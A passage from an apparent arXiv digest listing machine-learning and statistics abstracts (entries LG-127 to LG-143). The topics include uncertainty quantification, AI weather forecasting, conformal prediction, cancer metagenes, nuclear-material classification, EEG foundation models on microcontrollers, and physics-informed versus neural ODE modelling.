Abstract:Empirical likelihood is an attractive inferential framework that respects natural parameter boundaries, but existing approaches typically require smoothness of the functional and miscalibrate substantially when these assumptions are violated. For the optimal-value functional central to policy evaluation, smoothness holds only when the optimum is unique – a condition that fails exactly when rigorous inference is most needed where more complex policies have modest gains. In this work, we develop a bootstrap empirical likelihood method for partially nonsmooth functionals. Our analytic workhorse is a geometric reduction of the profile likelihood to the distance between the score mean and a level set whose shape (a tangent cone given by nonsmoothness patterns) determines the asymptotic distribution. Unlike the classical proof technology based on Taylor expansions on the dual optima, our geometric approach leverages properties of a deterministic convex program and can directly apply to nonsmooth functionals. Since the ordinary bootstrap is not valid in the presence of nonsmoothness, we derive a corrected multiplier bootstrap approach that adapts to the unknown level-set geometry.
[LG-127] Energy Score-Guided Neural Gaussian Mixture Model for Predictive Uncertainty Quantification
链接: https://arxiv.org/abs/2603.27672
作者: Yang Yang,Chunlin Ji,Haoyang Li,Ke Deng
类目: Machine Learning (stat.ML); Machine Learning (cs.LG)
*备注: 39 pages, 5 figures
Abstract:Quantifying predictive uncertainty is essential for real world machine learning applications, especially in scenarios requiring reliable and interpretable predictions. Many common parametric approaches rely on neural networks to estimate distribution parameters by optimizing the negative log likelihood. However, these methods often encounter challenges like training instability and mode collapse, leading to poor estimates of the mean and variance of the target output distribution. In this work, we propose the Neural Energy Gaussian Mixture Model (NE-GMM), a novel framework that integrates Gaussian Mixture Model (GMM) with Energy Score (ES) to enhance predictive uncertainty quantification. NE-GMM leverages the flexibility of GMM to capture complex multimodal distributions and leverages the robustness of ES to ensure well calibrated predictions in diverse scenarios. We theoretically prove that the hybrid loss function satisfies the properties of a strictly proper scoring rule, ensuring alignment with the true data distribution, and establish generalization error bounds, demonstrating that the model’s empirical performance closely aligns with its expected performance on unseen data. Extensive experiments on both synthetic and real world datasets demonstrate the superiority of NE-GMM in terms of both predictive accuracy and uncertainty quantification.
[LG-128] StretchCast: Global-Regional AI Weather Forecasting on Stretched Cubed-Sphere Mesh
链接: https://arxiv.org/abs/2603.27288
作者: Jin Feng
类目: Atmospheric and Oceanic Physics (physics.ao-ph); Machine Learning (cs.LG)
*备注:
Abstract:Global AI weather forecasting still relies mainly on uniform-resolution models, making it hard to combine regional refinement, two-way regional-global coupling, and affordable training cost. We introduce StretchCast, a global-regional AI forecasting framework built on a variable-resolution stretched cubed-sphere (SCS) mesh that preserves a closed global domain while concentrating resolution over a target region. Within this framework, we develop a one-step predictor, SCS_Base Model, and a rollout-oriented multistep predictor, SCS_FCST4 Model, to test the feasibility of SCS-based forecasting and the benefit of joint multistep training. Experiments use ERA5 with 69 variables over 1998-2022. Because training compute remains limited, this study uses a coarse-resolution proof-of-concept configuration rather than a final high-resolution system. Even with only about 7,776 effective global grid cells and roughly 0.875 degree resolution over the center-refined face, the 23M-parameter SCS_Base Model yields stable multivariate forecasts. With 83M parameters and training cost on the order of hours, SCS_FCST4 Model delivers competitive medium-range anomaly-correlation evolution over the target region after unified reprojection, especially for geopotential height, specific humidity, and part of the lower-tropospheric winds, while maintaining smooth cross-face continuity and realistic multiscale structure in typhoon and spectral analyses. These results support StretchCast as a practical lightweight foundation for global-regional AI weather forecasting.
[LG-129] Conformal Prediction Assessment: A Framework for Conditional Coverag e Evaluation and Selection
链接: https://arxiv.org/abs/2603.27189
作者: Zheng Zhou,Xiangfei Zhang,Chongguang Tao,Yuhong Yang
类目: Methodology (stat.ME); Machine Learning (cs.LG); Machine Learning (stat.ML)
*备注:
Abstract:Conformal prediction provides rigorous distribution-free finite-sample guarantees for marginal coverage under the assumption of exchangeability, but may exhibit systematic undercoverage or overcoverage for specific subpopulations. Assessing conditional validity is challenging, as standard stratification methods suffer from the curse of dimensionality. We propose Conformal Prediction Assessment (CPA), a framework that reframes the evaluation of conditional coverage as a supervised learning task by training a reliability estimator that predicts instance-level coverage probabilities. Building on this estimator, we introduce the Conditional Validity Index (CVI), which decomposes reliability into safety (undercoverage risk) and efficiency (overcoverage cost). We establish convergence rates for the reliability estimator and prove the consistency of CVI-based model selection. Extensive experiments on synthetic and real-world datasets demonstrate that CPA effectively diagnoses local failure modes and that CC-Select, our CVI-based model selection algorithm, consistently identifies predictors with superior conditional coverage performance.
[LG-130] Pan-Cancer Mapping of the Tumor Immune Landscape through Metagene Clustering and Predictive Modeling
链接: https://arxiv.org/abs/2603.27145
作者: Soham Chatterjee
类目: Genomics (q-bio.GN); Machine Learning (cs.LG)
*备注: 21 pages, 4 figures
Abstract:As immunotherapies become standard cancer treatments, it is increasingly important to identify a patient’s immune profile, which encompasses the activity of immune cells within the tumor microenvironment and the presence of specific biomarkers. However, we lack mechanistic explanations drivers of immune phenotypes. Despite advances in immune profiling with high-throughput sequencing, the mechanisms driving them remain unclear. This study aimed to identify novel, robust immune-related gene clusters (metagenes) and evaluate their prognostic significance and functional relevance across various pan-cancer types using a comprehensive computational pipeline. We acquired pan-cancer bulk RNA-seq and established immune subtypes from The Cancer Genome Atlas (TCGA). Using expression-based filtering and clustering of genes with ANOVA and Gaussian Mixture Model (GMM), we identified 48 unique metagenes. These metagenes achieved 87% accuracy in predicting the established subtypes. SHAP analysis revealed the most predictive metagenes per subtype, while functional enrichment analysis identified their associated pathways. Genes were ranked by differential expression between high- and low-expression groups. The metagenes revealed insights, including co-expression of immune activation and regulatory factors, links between cell cycle regulation and immune evasion, and dynamic microenvironment remodeling signatures. Kaplan-Meier survival analysis and multivariate Cox Regression revealed that many metagenes had prognostic value for overall survival. Overall, the metagenes represent coordinated biological programs across diverse cancer types, providing a foundation for developing robust, broadly applicable immuno-oncology biomarkers that extend beyond single-gene markers. They demonstrate prognostic value across cancer types and hold potential to guide immunotherapy treatment decisions.
[LG-131] Forecastability as an Information-Theoretic Limit on Prediction
链接: https://arxiv.org/abs/2603.27074
作者: Peter Maurice Catt
类目: Applications (stat.AP); Information Theory (cs.IT); Machine Learning (cs.LG); Machine Learning (stat.ML)
*备注:
Abstract:Forecasting is usually framed as a problem of model choice. This paper starts earlier, asking how much predictive information is available at each horizon. Under logarithmic loss, the answer is exact: the mutual information between the future observation and the declared information set equals the maximum achievable reduction in expected loss. This paper develops the consequences of that identity. Forecastability, defined as this mutual information evaluated across horizons, forms a profile whose shape reflects the dependence structure of the process and need not be monotone. Three structural properties are derived: compression of the information set can only reduce forecastability; the gap between the profile under a finite lag window and the full history gives an exact truncation error budget; and for processes with periodic dependence, the profile inherits the periodicity. Predictive loss decomposes into an irreducible component fixed by the information structure and an approximation component attributable to the method; their ratio defines the exploitation ratio, a normalised diagnostic for method adequacy. The exact equality is specific to log loss, but when forecastability is near zero, classical inequalities imply that no method under any loss can materially improve on the unconditional baseline. The framework provides a theoretical foundation for assessing, prior to any modelling, whether the declared information set contains sufficient predictive information at the horizon of interest.
[LG-132] On the Loss Landscape Geometry of Regularized Deep Matrix Factorization: Uniqueness and Sharpness
链接: https://arxiv.org/abs/2603.27072
作者: Anil Kamber,Rahul Parhi
类目: Machine Learning (stat.ML); Machine Learning (cs.LG)
*备注: 32 pages, 3 figures
Abstract:Weight decay is ubiquitous in training deep neural network architectures. Its empirical success is often attributed to capacity control; nonetheless, our theoretical understanding of its effect on the loss landscape and the set of minimizers remains limited. In this paper, we show that \ell^2 -regularized deep matrix factorization/deep linear network training problems with squared-error loss admit a unique end-to-end minimizer for all target matrices subject to factorization, except for a set of Lebesgue measure zero formed by the depth and the regularization parameter. This observation reveals fundamental properties of the loss landscape of regularized deep matrix factorization problems: the Hessian spectrum is constant across all minimizers of the regularized deep scalar factorization problem with squared-error loss. Moreover, we show that, in regularized deep matrix factorization problems with squared-error loss, if the target matrix does not belong to the Lebesgue measure-zero set, then the Frobenius norm of each layer is constant across all minimizers. This, in turn, yields a global lower bound on the trace of the Hessian evaluated at any minimizer of the regularized deep matrix factorization problem. Furthermore, we establish a critical threshold for the regularization parameter above which the unique end-to-end minimizer collapses to zero.
[LG-133] Overcoming the Incentive Collapse Paradox
链接: https://arxiv.org/abs/2603.27049
作者: Qichuan Yin,Ziwei Su,Shuangning Li
类目: Machine Learning (stat.ML); Machine Learning (cs.LG)
*备注:
Abstract:AI-assisted task delegation is increasingly common, yet human effort in such systems is costly and typically unobserved. Recent work by Bastani and Cachon (2025); Sambasivan et al. (2021) shows that accuracy-based payment schemes suffer from incentive collapse: as AI accuracy improves, sustaining positive human effort requires unbounded payments. We study this problem in a budget-constrained principal-agent framework with strategic human agents whose output accuracy depends on unobserved effort. We propose a sentinel-auditing payment mechanism that enforces a strictly positive and controllable level of human effort at finite cost, independent of AI accuracy. Building on this incentive-robust foundation, we develop an incentive-aware active statistical inference framework that jointly optimizes (i) the auditing rate and (ii) active sampling and budget allocation across tasks of varying difficulty to minimize the final statistical loss under a single budget. Experiments demonstrate improved cost-error tradeoffs relative to standard active learning and auditing-only baselines.
[LG-134] Material Identification using Multi-Modal Intrinsic Radiation and Radiography
链接: https://arxiv.org/abs/2603.27036
作者: Khoa Nguyen,Brendt Wohlberg,Oleg Korobkin,Marc Klasky
类目: Instrumentation and Detectors (physics.ins-det); Machine Learning (cs.LG)
*备注:
Abstract:We investigate multi-modal material identification for special nuclear material (SNM) configurations using a combination of X-ray radiography, high-resolution \gamma-ray spectroscopy, and neutron multiplicity measurements. We consider a Beryllium Reflected Plutonium sphere (BeRP) ball surrounded by one or two concentric shielding shells of unknown composition whose radii are assumed known from radiography. High-purity germanium (HPGe) spectra are reduced to net counts in selected Pu-239 photo-peaks, while neutron multiplicity information is summarized by Feynman variances Y2 and Y3 computed from factorial moments of the neutron counting statistics. Using synthetic data generated with the Gamma Detector Response and Analysis Software (GADRAS) for a range of shielding materials and thicknesses, we cast the material identification problem as a supervised multi-class classification task over all admissible shell-material combinations. We demonstrate that a random forest classifier trained on combined gamma and neutron features achieves almost perfect identification accuracy for single-shell cases, and substantial performance gains for more challenging double-shell configurations relative to gamma-only classification. Alternative statistical and machine-learning formulations for this multi-class problem are examined along with examination of the impact of model-mismatch between the forward model and the test cases as given by variations in the statistical noise. Opportunities for extending the approach to more complex geometries and experimental data are also discussed.
[LG-135] Parameter Estimation in Stochastic Differential Equations via Wiener Chaos Expansion and Stochastic Gradient Descent
链接: https://arxiv.org/abs/2603.27019
作者: Francisco Delgado-Vences,José Julián Pavón-Español,Arelly Ornelas
类目: Machine Learning (stat.ML); Machine Learning (cs.LG); Probability (math.PR); Methodology (stat.ME)
*备注: 25 pages, 3 figures. This manuscript has been submitted to Applied Mathematical Modelling for publication
Abstract:This study addresses the inverse problem of parameter estimation for Stochastic Differential Equations (SDEs) by minimizing a regularized discrepancy functional via Stochastic Gradient Descent (SGD). To achieve computational efficiency, we leverage the Wiener Chaos Expansion (WCE), a spectral decomposition technique that projects the stochastic solution onto an orthogonal basis of Hermite polynomials. This transformation effectively maps the stochastic dynamics into a hierarchical system of deterministic functions, termed the \textitpropagator. By reducing the stochastic inference task to a deterministic optimization problem, our framework circumvents the heavy computational burden and sampling requirements of traditional simulation-based methods like MCMC or MLE. The robustness and scalability of the proposed approach are demonstrated through numerical experiments on various non-linear SDEs, including models for individual biological growth. Results show that the WCE-SGD framework provides accurate parameter recovery even from discrete, noisy observations, offering a significant paradigm shift in the efficient modeling of complex stochastic systems.
[LG-136] On-Device Super Resolution Imaging Using Low-Cost SPAD Array and Embedded Lightweight Deep Learning
链接: https://arxiv.org/abs/2603.27018
作者: Zhenya Zang,Xingda Li,David Day Uei Li
类目: Image and Video Processing (eess.IV); Machine Learning (cs.LG)
*备注:
Abstract:This work presents a lightweight super-resolution (LiteSR) neural network for depth and intensity images acquired from a consumer-grade single-photon avalanche diode (SPAD) array with a 48x32 spatial resolution. The proposed framework reconstructs high-resolution (HR) images of size 256x256. Both synthetic and real datasets are used for performance evaluation. Extensive quantitative metrics demonstrate high reconstruction fidelity on synthetic datasets, while experiments on real indoor and outdoor measurements further confirm the robustness of the proposed approach. Moreover, the SPAD sensor is interfaced with an Arduino UNO Q microcontroller, which receives low-resolution (LR) depth and intensity images and feeds them into a compressed, pre-trained deep learning (DL) model, enabling real-time SR video streaming. In addition to the 256x256 setting, a range of target HR resolutions is evaluated to determine the maximum achievable upscaling resolution (512x512) with LiteSR, including scenarios with noise-corrupted LR inputs. The proposed LiteSR-embedded system co-design provides a scalable, cost-effective solution to enhance the spatial resolution of current consumer-grade SPAD arrays to meet HR imaging requirements.
[LG-137] Graph Attention Network-Based Detection of Autism Spectrum Disorder
链接: https://arxiv.org/abs/2603.26971
作者: Abigail Kelly,Ramchandra Rimal,Arpan Sainju
类目: Applications (stat.AP); Machine Learning (cs.LG)
*备注:
Abstract:Autism Spectrum Disorder (ASD) is a neurodevelopmental condition characterized by atypical brain connectivity. One of the crucial steps in addressing ASD is its early detection. This study introduces a novel computational framework that employs an Attention-Based Graph Convolutional Network, referred to as the GATGraphClassifier, for detecting ASD. We utilize Functional Magnetic Resonance Imaging (fMRI) data from the Autism Brain Imaging Data Exchange (ABIDE) repository to construct functional connectivity matrices using Pearson correlation, which captures interactions between various brain regions. These matrices are then transformed into graph representations, where the nodes and edges represent the brain regions and functional connections, respectively. The GATGraphClassifier employs attention mechanisms to identify critical connectivity patterns, thereby enhancing the model’s interpretability and diagnostic accuracy. Our proposed framework demonstrates superior performance across all standard classification metrics compared to existing state-of-the-art methods. Notably, we achieved an average accuracy of 88.79% on the test data over 30 independent runs, surpassing the benchmark model’s performance by 12.27%. In addition, we identified the crucial brain regions associated with ASD, consistent with the previous studies, and a few novel regions. This study not only contributes to the advancement of ASD detection but also shows the potential for broader adaptability of GATGraphClassifier in analyzing complex relational data in various fields, where understanding intricate connectivity and interaction patterns is essential.
[LG-138] Static and Dynamic Approaches to Computing Barycenters of Probability Measures on Graphs
链接: https://arxiv.org/abs/2603.26940
作者: David Gentile,James M. Murphy
类目: Machine Learning (stat.ML); Machine Learning (cs.LG); Probability (math.PR)
*备注: 31 pages, 17 figures, 1 table
Abstract:The optimal transportation problem defines a geometry of probability measures which leads to a definition for weighted averages (barycenters) of measures, finding application in the machine learning and computer vision communities as a signal processing tool. Here, we implement a barycentric coding model for measures which are supported on a graph, a context in which the classical optimal transport geometry becomes degenerate, by leveraging a Riemannian structure on the simplex induced by a dynamic formulation of the optimal transport problem. We approximate the exponential mapping associated to the Riemannian structure, as well as its inverse, by utilizing past approaches which compute action minimizing curves in order to numerically approximate transport distances for measures supported on discrete spaces. Intrinsic gradient descent is then used to synthesize barycenters, wherein gradients of a variance functional are computed by approximating geodesic curves between the current iterate and the reference measures; iterates are then pushed forward via a discretization of the continuity equation. Analysis of measures with respect to given dictionary of references is performed by solving a quadratic program formed by computing geodesics between target and reference measures. We compare our novel approach to one based on entropic regularization of the static formulation of the optimal transport problem where the graph structure is encoded via graph distance functions, we present numerical experiments validating our approach, and we conclude that intrinsic gradient descent on the probability simplex provides a coherent framework for the synthesis and analysis of measures supported on graphs.
[LG-139] Koopman Operator Identification of Model Parameter Trajectories for Temporal Domain Generalization (KOMET)
链接: https://arxiv.org/abs/2603.26923
作者: Randy C. Hoover,Jacob James,Paul May,Kyle Caudle
类目: Machine Learning (stat.ML); Machine Learning (cs.LG); Dynamical Systems (math.DS)
*备注:
Abstract:Parametric models deployed in non-stationary environments degrade as the underlying data distribution evolves over time (a phenomenon known as temporal domain drift). In the current work, we present KOMET (Koopman Operator identification of Model parameter Evolution under Temporal drift), a model-agnostic, data-driven framework that treats the sequence of trained parameter vectors as the trajectory of a nonlinear dynamical system and identifies its governing linear operator via Extended Dynamic Mode Decomposition (EDMD). A warm-start sequential training protocol enforces parameter-trajectory smoothness, and a Fourier-augmented observable dictionary exploits the periodic structure inherent in many real-world distribution drifts. Once identified, KOMET’s Koopman operator predicts future parameter trajectories autonomously, without access to future labeled data, enabling zero-retraining adaptation at deployment. Evaluated on six datasets spanning rotating, oscillating, and expanding distribution geometries, KOMET achieves mean autonomous-rollout accuracies between 0.981 and 1.000 over 100 held-out time steps. Spectral and coupling analyses further reveal interpretable dynamical structure consistent with the geometry of the drifting decision boundary.
[LG-140] Comparing Physics-Informed and Neural ODE Approaches for Modeling Nonlinear Biological Systems: A Case Study Based on the Morris-Lecar Model
链接: https://arxiv.org/abs/2603.26921
作者: Nikolaos M. Matzakos,Chrisovalantis Sfyrakis
类目: Dynamical Systems (math.DS); Machine Learning (cs.LG)
*备注: 25 pages, 11 figures
Abstract:Physics-Informed Neural Networks (PINNs) and Neural Ordinary Differential Equations (NODEs) represent two distinct machine learning frameworks for modeling nonlinear neuronal dynamics. This study systematically evaluates their performance on the two-dimensional Morris-Lecar model across three canonical bifurcation regimes: Hopf, Saddle-Node on Limit Cycle, and homoclinic orbit. Synthetic time-series data are generated via numerical integration under controlled conditions, and training is performed using collocation points for PINNs and adaptive solvers for NODEs (Dormand-Prince method). PINNs incorporate the governing differential equations into the loss function using automatic differentiation, which enforces physical consistency during training. In contrast, NODEs learn the system’s vector field directly from data, without prior structural assumptions or inductive bias toward physical laws. Model performance is assessed using standard regression metrics, including Mean Squared Error (MSE), Mean Absolute Error (MAE), Mean Absolute Percentage Error (MAPE), and the coefficient of determination. Results indicate that PINNs tend to achieve higher accuracy and robustness in scenarios involving stiffness or sensitive bifurcations, owing to their embedded physical structure. NODEs, while more expressive and flexible, operate as black-box approximators without structural constraints, which can lead to reduced interpretability and stability in these regimes. Although advanced variants of NODEs (e.g., ANODEs, latent NODEs) aim to mitigate such limitations, their performance under stiff dynamics remains an open question. These findings emphasize the trade-offs between physics-informed models, which embed structure and interpretability, and purely data-driven approaches, which prioritize flexibility at the cost of physical consistency. Comments: 25 pages, 11 figures Subjects: Dynamical Systems (math.DS); Machine Learning (cs.LG) MSC classes: 68T07, 65L05, 92B20, 34C23 Cite as: arXiv:2603.26921 [math.DS] (or arXiv:2603.26921v1 [math.DS] for this version) https://doi.org/10.48550/arXiv.2603.26921 Focus to learn more arXiv-issued DOI via DataCite (pending registration) Submission history From: Nikolaos Matzakos M [view email] [v1] Fri, 27 Mar 2026 18:53:53 UTC (1,095 KB)
[LG-141] Calorimeter Shower Superresolution with Conditional Normalizing Flows: Implementation and Statistical Evaluation
链接: https://arxiv.org/abs/2603.26813
作者: Andrea Cosso
类目: Instrumentation and Detectors (physics.ins-det); Machine Learning (cs.LG); Machine Learning (stat.ML)
*备注: Master’s thesis. arXiv admin note: text overlap with arXiv:2409.16336 by other authors
Abstract:In High Energy Physics, detailed calorimeter simulations and reconstructions are essential for accurate energy measurements and particle identification, but their high granularity makes them computationally expensive. Developing data-driven techniques capable of recovering fine-grained information from coarser readouts, a task known as calorimeter superresolution, offers a promising way to reduce both computational and hardware costs while preserving detector performance. This thesis investigates whether a generative model originally designed for fast simulation can be effectively applied to calorimeter superresolution. Specifically, the model proposed in arXiv:2308.11700 is re-implemented independently and trained on the CaloChallenge 2022 dataset based on the Geant4 Par04 calorimeter geometry. Finally, the model’s performance is assessed through a rigorous statistical evaluation framework, following the methodology introduced in arXiv:2409.16336, to quantitatively test its ability to reproduce the reference distributions.
[LG-142] Interpretable liquid crystal phase classification via two-by-two ordinal patterns
链接: https://arxiv.org/abs/2603.26723
作者: Leonardo G. J. M. Voltarelli,Natalia Osiecka-Drewniak,Marcin Piwowarczyk,Ewa Juszynska-Galazka,Rafael S. Zola,Matjaz Perc,Haroldo V. Ribeiro
类目: oft Condensed Matter (cond-mat.soft); Machine Learning (cs.LG)
*备注: 16 two-column pages, 8 figures, supplementary information; accepted for publication in Physical Review E
Abstract:Liquid crystal textures encode rich structural information, yet mapping these images to mesophase identity remains challenging because visually similar patterns can arise from distinct structures. Here we present a simple, interpretable representation that maps textures to a 75-dimensional frequency vector of two-by-two ordinal patterns, grouped into eleven symmetry-based types to characterize a large-scale dataset spanning seven mesophases. Combined with a simple machine learning classifier, this lightweight representation yields near-perfect phase recognition, including the difficult distinction between smectic A and smectic B mesophases. Our approach generalizes to unseen compounds and accurately distinguishes between phase identity and material origin. Unlike deep learning methods, each ordinal pattern is readily interpretable, and model explanations augmented with network visualizations of pattern interactions reveal the specific types and pairwise dependencies that drive each mesophase decision, providing compact, physically meaningful summaries of texture determinants. These results establish two-by-two ordinal patterns as an interpretable and scalable tool for liquid crystal image analysis, with potential applications to other complex patterned systems in materials science.
[LG-143] FEMBA on the Edge: Physiologically-Aware Pre-Training Quantization and Deployment of a Bidirectional Mamba EEG Foundation Model on an Ultra-low Power Microcontroller
链接: https://arxiv.org/abs/2603.26716
作者: Anna Tegon,Nicholas Lehmann,Yawei Li,Andrea Cossettini,Luca Benini,Thorir Mar Ingolfsson
类目: ignal Processing (eess.SP); Machine Learning (cs.LG)
*备注: 10 pages, 9 tables, 1 figure
Abstract:Objective: To enable continuous, long-term neuro-monitoring on wearable devices by overcoming the computational bottlenecks of Transformer-based Electroencephalography (EEG) foundation models and the quantization challenges inherent to State-Space Models (SSMs). Methods: We present FEMBA, a bidirectional Mamba architecture pre-trained on over 21,000 hours of EEG. We introduce a novel Physiologically-Aware pre-training objective, consisting of a reconstruction with low-pass filtering, to prioritize neural oscillations over high-frequency artifacts. To address the activation outliers common in SSMs, we employ Quantization-Aware Training (QAT) to compress the model to 2-bit weights. The framework is deployed on a parallel ultra-low-power RISC-V microcontroller (GAP9) using a custom double-buffered memory streaming scheme. Results: The proposed low-pass pre-training improves downstream AUROC on TUAB from 0.863 to 0.893 and AUPR from 0.862 to 0.898 compared to the best contrastive baseline. QAT successfully compresses weights with negligible performance loss, whereas standard post-training quantization degrades accuracy by approximately \textbf30%. The embedded implementation achieves deterministic real-time inference (\textbf1.70~s per 5~s window) and reduces the memory footprint by \textbf74% (to \approx 2~MB), achieving competitive accuracy with up to \textbf27 \times fewer FLOPs than Transformer benchmarks. Conclusion: FEMBA demonstrates that Mamba-based foundation models can be effectively quantized and deployed on extreme-edge hardware without sacrificing the representation quality required for robust clinical analysis. Significance: This work establishes the first full-stack framework for deploying large-scale EEG foundation models on ultra-low-power wearables, facilitating continuous, SSM based monitoring for epilepsy and sleep disorders.
附件下载



